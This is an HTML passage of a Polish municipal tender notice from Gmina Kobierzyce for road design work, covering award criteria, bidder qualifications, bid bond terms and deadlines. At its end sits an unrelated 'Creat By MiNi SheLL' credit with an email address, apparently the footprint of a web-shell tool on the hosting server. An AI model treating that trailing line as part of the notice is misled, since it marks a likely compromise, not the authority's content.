class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp. Całkowita wartość tych zamówień została uwzględniona przy obliczaniu jego<br/>wartości i wynosi do 50 % szacunkowej wartości zamówienia podstawowego. Ewentualny<br/>RZP.271.19.2025-2<br/>8<br/>zakres powyższych zamówień może dotyczyć całego zakresu zamówienia podstawowego tj.<br/>wykonanie dokumentacji projektowo-kosztorysowej budowy drogi wraz z infrastrukturą<br/>towarzyszącą oraz uzyskaniem ostatecznej decyzji ZRID. Zamówienia podobne, zostaną<br/>udzielone na warunkach określonych w umowie podstawowej. Wykonawca przed zawarciem<br/>umowy zobowiązany będzie złożyć oświadczenie, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp w zakresie nie szerszym niż wskazane w postępowaniu o udzielenie zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert<br/>określonych w Specyfikacji Warunków Zamówienia.<br/>Kryteria oceny ofert określone przez Zamawiającego: cena ofertowa, oraz doświadczenie<br/>RZP.271.19.2025-2<br/>37<br/>projektanta<br/>-------------------------------------------------------------------------<br/>A) Cena ofertowa (C) - waga 60%<br/>-------------------------------------------------------------------------<br/>Oferta o najniższej cenie brutto uzyska w tym kryterium największą ilość punktów.<br/>Wykonawcom przyznana zostanie odpowiednio ilość punktów wyliczona wg wzoru:<br/> C = ( Cmin. : Cn ) x 60 pkt<br/>gdzie:<br/> C - ilość punktów n-tej ocenianej oferty brutto<br/> Cmin. - najniższa cena oferty brutto<br/> Cn - cena badanej n-tej oferty brutto<br/>Wartość punktowa obliczona zostanie z dokładnością do 2 miejsc po przecinku.<br/>Ceny w ofercie należy podać w złotych polskich z uwzględnieniem podatku od towarów<br/>i usług VAT.<br/>--------------------------------------------------------------------------------------------<br/>B) Kryterium – doświadczenie projektanta – waga 40 %<br/>--------------------------------------------------------------------------------------------<br/>Kryterium rozpatrywane będzie na podstawie liczby wykazanych w formularzu oferty<br/>dokumentacji projektowych zrealizowanych przez głównego projektanta.<br/>Wykonawca w ramach tego kryterium może wskazać jedną osobę, która będzie pełnić<br/>funkcję głównego projektanta posiadającego uprawnienia budowlane bez ograniczeń do projektowania w specjalności inżynieryjnej drogowej.<br/>Zamawiający wymaga, aby osoba, której doświadczenie będzie oceniane w tym kryterium,<br/>była jednocześnie osobą, która Wykonawca wykaże w „Wykazie osób”, celem potwierdzenia<br/>spełnienia warunku udziału w postępowaniu.<br/>Zamawiający przyzna punkty w przedmiotowym kryterium za zatrudnienie do realizacji prac<br/>projektanta w specjalności inżynieryjnej drogowej posiadającego uprawnienia budowlane<br/>bez ograniczeń do projektowania z doświadczeniem w sporządzaniu dokumentacji<br/>projektowej obejmującej swoim zakresem projekt budowy lub przebudowy drogi o długości<br/>500 m lub rozbudowy drogi o długości 500 m z uzyskaniem ostatecznej decyzji pozwolenia na<br/>budowę/ZRID/braku sprzeciwu do zgłoszenia.<br/>Zamawiający oceni realizacje wykonane w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert. W przypadku przedstawienia zadań wykonanych wcześniej niż 5 lat przed<br/>upływem terminu składania ofert, Zamawiający nie będzie brał ich pod uwagę w ocenie<br/>punktowej.<br/>Ocena zostanie przeprowadzona na podstawie danych uzupełnionych w tabeli, w formularzu<br/>ofertowym.<br/>Zamawiający przyzna punkty zgodnie z poniższą tabelą.<br/>Doświadczenie projektanta w specjalności drogowej- liczba<br/>wykonanych dokumentacji projektowych obejmujących<br/>swoim zakresem projekt budowy lub przebudowy drogi o<br/>długości 500 m lub rozbudowy drogi o długości 500 m z<br/>uzyskaniem ostatecznej decyzji pozwolenia na<br/>budowę/ZRID/braku sprzeciwu do zgłoszenia.<br/>Liczba punktów<br/>0 0<br/>1-4 20<br/>5 i więcej 40</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>na zasadach określonych w Rozdziale XI SWZ oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min.<br/>150.000,00 zł.<br/>d) zdolności technicznej lub zawodowej:<br/> Zdolność zawodowa:<br/>W zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli<br/>Wykonawca wykaże, że dysponuje następującymi osobami, które będą uczestniczyć<br/>w wykonywaniu zamówienia:<br/>➢co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia,<br/>posiadająca uprawnienia budowlane do projektowania w specjalności inżynieryjnej<br/>drogowej bez ograniczeń oraz doświadczenie zawodowe przy pracach projektowych<br/>w wymiarze minimum 5 lat.<br/>RZP.271.19.2025-2<br/>➢ co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia,<br/>posiadająca uprawnienia budowlane do projektowania w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń oraz doświadczenie zawodowe przy pracach projektowych w wymiarze<br/>minimum 5 lat.<br/>➢ co najmniej jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia,<br/>posiadająca uprawnienia budowlane do projektowania w specjalności sanitarnej<br/>oraz doświadczenie zawodowe przy pracach projektowych w wymiarze minimum 5<br/>lat <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594 ze<br/>zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek<br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej - załącznik nr 6 do SWZ;<br/>2) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, które wykonawca złożył wraz z ofertą;<br/>wzór oświadczenia stanowi -Załącznik nr 7 do SWZ.<br/>3) Oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie art. 7 ust. 1 –<br/>3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego. Wykonawca składa na wzorze stanowiącym -<br/>Załącznik nr 8 do niniejszej SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik<br/>nr 3 do SWZ);<br/>b. dokumenty potwierdzające, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną wskazaną przez Zamawiającego<br/>tj. 150.000,00zł.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium<br/>w wysokości: 2.000,00 (słownie: dwa tysiące złotych 00/100);<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwalnie<br/>do dnia upływu terminu związania ofertą.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego<br/>wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz. U. z 2024 r. poz. 462).<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany<br/>przez zamawiającego - Gmina Kobierzyce: Al. Pałacowa 1, 55-040 Kobierzyce konto<br/>bankowe BS Kobierzyce nr 82 95750004 0000 0130 2000 0380 z dopiskiem – Wadium/ UWAGA: Za termin wniesienia wadium w<br/>formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. Zaleca się<br/>dołączenie do oferty kopii polecenia przelewu.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał<br/>gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium<br/>przez Wykonawcę określone w ustawie p.z.p.;<br/>2)z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania<br/>ofert);<br/>RZP.271.19.2025-2<br/>35<br/>5)w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Kobierzyce<br/>7)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58<br/>p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>8) Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy<br/>lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży<br/>wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie<br/>odrzucona.<br/>9) Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych<br/>we wzorze umowy stanowiący załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę wraz z wymaganymi dokumentami należy umieścić na platformie przetargowej LOGINTRADE w myśl ustawy na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com